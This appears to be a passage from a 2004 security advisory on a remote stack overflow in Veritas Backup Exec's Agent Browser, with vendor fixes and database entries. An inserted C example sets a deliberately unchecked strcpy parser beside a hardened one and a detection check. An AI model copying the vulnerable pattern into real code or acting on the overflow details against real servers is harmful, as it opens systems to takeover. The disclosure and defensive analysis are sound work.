http://veritas.com/Products/www?c=product&refId=57

II. DESCRIPTION

Remote exploitation of a stack-based buffer overflow vulnerability in
Veritas Backup Exec allows attackers to execute arbitrary code.

The vulnerability specifically exists within the function responsible
for receiving and parsing registration requests. The registration
request packet contains the hostname and connecting TCP port of the
client which is stored in an array on the stack. An attacker can send a
registration request with an overly long hostname value to overflow the
array and take control of the saved return address to execute arbitrary
code.
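The defect described in section II above (a client-supplied hostname stored in a fixed stack array with no length check) and the threshold quoted in the Metasploit module description earlier on this page (an agent name of 63 bytes or more reaches the saved return address), shown as an added C example. This code is not from the page, the advisory, or any Backup Exec component: the wire layout (NUL-terminated hostname followed by a NUL-terminated decimal port), the 63-byte buffer size, and every function name are assumptions constructed for illustration. The unchecked variant sits beside a checked parser that validates each field length before copying anything, and `registration_hostname_len` is the same measurement a sensor would apply to a captured registration request to flag oversized hostnames.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stddef.h>

/* Constructed sizes (assumption, not taken from benetns.exe): the page says a
 * hostname of 63 bytes or more overflows, so the illustrative stack array is
 * 63 bytes, i.e. 62 characters plus the terminating NUL. */
#define HOSTNAME_BUF     63
#define MAX_HOSTNAME_LEN (HOSTNAME_BUF - 1)   /* 62: longest hostname that still fits */
#define PORT_BUF         8

struct registration {
    char hostname[HOSTNAME_BUF];
    unsigned short port;
};

/* Vulnerable pattern described by the advisory (CWE-121): fields are copied
 * into fixed stack arrays with no check against their size. It exists only to
 * be read beside the fix; never feed it untrusted input. */
int register_client_unchecked(const char *pkt)
{
    char hostname[HOSTNAME_BUF];
    char port[PORT_BUF];

    strcpy(hostname, pkt);                    /* no bound: >= 63 bytes writes past the array */
    strcpy(port, pkt + strlen(pkt) + 1);      /* same defect for the port field */
    return (int)strtol(port, NULL, 10);
}

/* Length of the hostname field, or -1 if no NUL terminator lies within 'len'.
 * Used by the parser below; a network sensor can apply the same measurement to
 * a captured request and alert when the result is >= 63 (the page's threshold). */
long registration_hostname_len(const unsigned char *pkt, size_t len)
{
    const unsigned char *nul = memchr(pkt, '\0', len);
    return nul ? (long)(nul - pkt) : -1;
}

/* Hardened parser: every field length is validated against its destination
 * before a single byte is copied. Returns 0 on success, -1 for a malformed or
 * oversized request (the caller should drop the connection and log it). */
int parse_registration_checked(const unsigned char *pkt, size_t len, struct registration *out)
{
    long hlen = registration_hostname_len(pkt, len);
    if (hlen <= 0 || hlen > MAX_HOSTNAME_LEN)
        return -1;                            /* missing, empty, or too long for the buffer */

    size_t off = (size_t)hlen + 1;            /* skip the hostname and its NUL */
    const unsigned char *pnul = memchr(pkt + off, '\0', len - off);
    if (pnul == NULL)
        return -1;                            /* port field not terminated inside the packet */
    size_t plen = (size_t)(pnul - (pkt + off));
    if (plen == 0 || plen > 5)
        return -1;                            /* a TCP port has at most 5 decimal digits */

    char portbuf[PORT_BUF];
    memcpy(portbuf, pkt + off, plen);
    portbuf[plen] = '\0';
    char *endp;
    long port = strtol(portbuf, &endp, 10);
    if (*endp != '\0' || port < 1 || port > 65535)
        return -1;                            /* non-numeric or out-of-range port */

    memcpy(out->hostname, pkt, (size_t)hlen); /* copy only after the length was proven to fit */
    out->hostname[hlen] = '\0';
    out->port = (unsigned short)port;
    return 0;
}

/* Builds a constructed sample request in the simplified layout above. */
size_t build_request(unsigned char *buf, size_t cap, const char *host, const char *port)
{
    size_t hl = strlen(host), pl = strlen(port);
    if (hl + 1 + pl + 1 > cap) return 0;
    memcpy(buf, host, hl);           buf[hl] = '\0';
    memcpy(buf + hl + 1, port, pl);  buf[hl + 1 + pl] = '\0';
    return hl + 1 + pl + 1;
}

/* Verdict of the checked parser for a hostname of n 'A' bytes: 0 accept, -1 reject. */
int checked_verdict_for_hostname_len(size_t n)
{
    unsigned char pkt[512];
    char host[400];
    struct registration r;
    if (n >= sizeof host) return -1;
    memset(host, 'A', n); host[n] = '\0';
    size_t len = build_request(pkt, sizeof pkt, host, "6101");
    return parse_registration_checked(pkt, len, &r);
}

/* Port path: parse a request with a short hostname and the given port text;
 * returns the parsed port, or -1 if the checked parser rejected the request. */
int checked_port_for(const char *port_text)
{
    unsigned char pkt[64];
    struct registration r;
    size_t len = build_request(pkt, sizeof pkt, "host", port_text);
    if (len == 0 || parse_registration_checked(pkt, len, &r) != 0) return -1;
    return r.port;
}

int main(void)
{
    printf("62-byte hostname verdict: %d\n", checked_verdict_for_hostname_len(62));
    printf("63-byte hostname verdict: %d\n", checked_verdict_for_hostname_len(63));
    printf("port 6101 parsed as: %d\n", checked_port_for("6101"));
    return 0;
}
```

The design point is the order of operations: the checked parser measures the field, compares it with the destination size, and only then copies, whereas the unchecked variant lets the sender decide how many bytes land on the stack. The same `registration_hostname_len` measurement, applied to traffic arriving on the Agent Browser port, gives a simple detection signal alongside the firewall restriction the advisory recommends.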

III. ANALYSIS

Successful exploitation does not require authentication thereby allowing
any remote attacker to execute arbitrary code under the privileges of
the Backup Exec Agent Browser (benetns.exe) process which is usually a
domain administrative account.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in Backup
Exec for Windows Servers 9.1.

V. WORKAROUND

Use a firewall to restrict incoming connections to trusted workstations
running the Backup Exec client software.

VI. VENDOR RESPONSE

8.60.3878 Hotfix 68 - Backup Exec
(Buffer overflow creates a security hole in Agent Browser)

   http://seer.support.veritas.com/docs/273422.htm

9.1.4691 Hotfix 40 - Backup Exec
(Buffer overflow creates a security hole in Agent Browser;
Licensed Storage Central becomes Eval when Backup Exec 9.1 is uninstalled)
*Requires Backup Exec 9.1.4691 Service Pack 1

   http://seer.support.veritas.com/docs/273420.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-1172 to this issue. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/02/2004   Initial vendor contact
12/16/2004   Initial vendor response
12/16/2004   Public disclosure

IX. CREDIT

An anonymous contributor and Patrik Karlsson (http://www.cqure.net) are
credited with discovering this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an as is condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

    

- Vulnerability information

12418
VERITAS Backup Exec Registration Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

A remote overflow exists in Veritas Backup Exec for Windows. The name server registration service (benetns.exe) fails to validate the client hostname field during the registration process, resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause custom code to run in the process's current context, which is typically that of domain administrator. This can result in a loss of integrity.

- Timeline

2004-12-16 2004-11-02
2005-01-05 2005-02-08

- Solution

Upgrade to version 8.60.3878 Hotfix 68 or version 9.1.4691 Hotfix 40 or higher, as both have been reported by the vendor to fix this vulnerability. It is also possible to mitigate the flaw by implementing the following workaround(s): Disallow untrusted clients to connect to the affected service by blocking access to the Generic Remote File System (GRFS) port (usually 6101/TCP).

- Vulnerability information

VERITAS Backup Exec Agent Browser Remote Buffer Overflow Vulnerability
Boundary Condition Error 11974
Yes No
2004-12-16 12:00:00 2007-11-01 09:56:00
This issue is credited to an anonymous researcher and Patrik Karlsson.

- Affected program versions

Veritas Software Backup Exec for Windows Servers 9.1
Veritas Software Backup Exec for Windows Servers 9.0
Veritas Software Backup Exec for Windows Servers 8.6.3878
Veritas Software Backup Exec for Windows Servers 8.6
Veritas Software Backup Exec for Windows Servers 8.5.3572
Veritas Software Backup Exec for Windows Servers 8.5
Veritas Software Backup Exec for Windows Servers 8.0.3315
Veritas Software Backup Exec for Windows Servers 8.0
Veritas Software Backup Exec for Windows Servers 7.3.2575

- Vulnerability discussion

Veritas Backup Exec is prone to a remote buffer-overflow vulnerability because the application fails to carry out proper boundary checks before copying user-supplied data into sensitive process buffers. A remote attacker can exploit this issue to execute arbitrary code on a vulnerable computer leading to a complete compromise.

This issue presents itself in an unspecified function that is responsible for handling registration requests. This function is part of the Agent Browser service code.

- Exploitation

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been released as part of the MetaSploit Framework 2.3.

An additional exploit has been released.

- Solution

Veritas has released an advisory (Document ID: 273419) with fix information to address this issue in Backup Exec 8.6 and Backup Exec 9.1. Please see the references for more information.


Veritas Software Backup Exec for Windows Servers 8.6

Veritas Software Backup Exec for Windows Servers 9.1

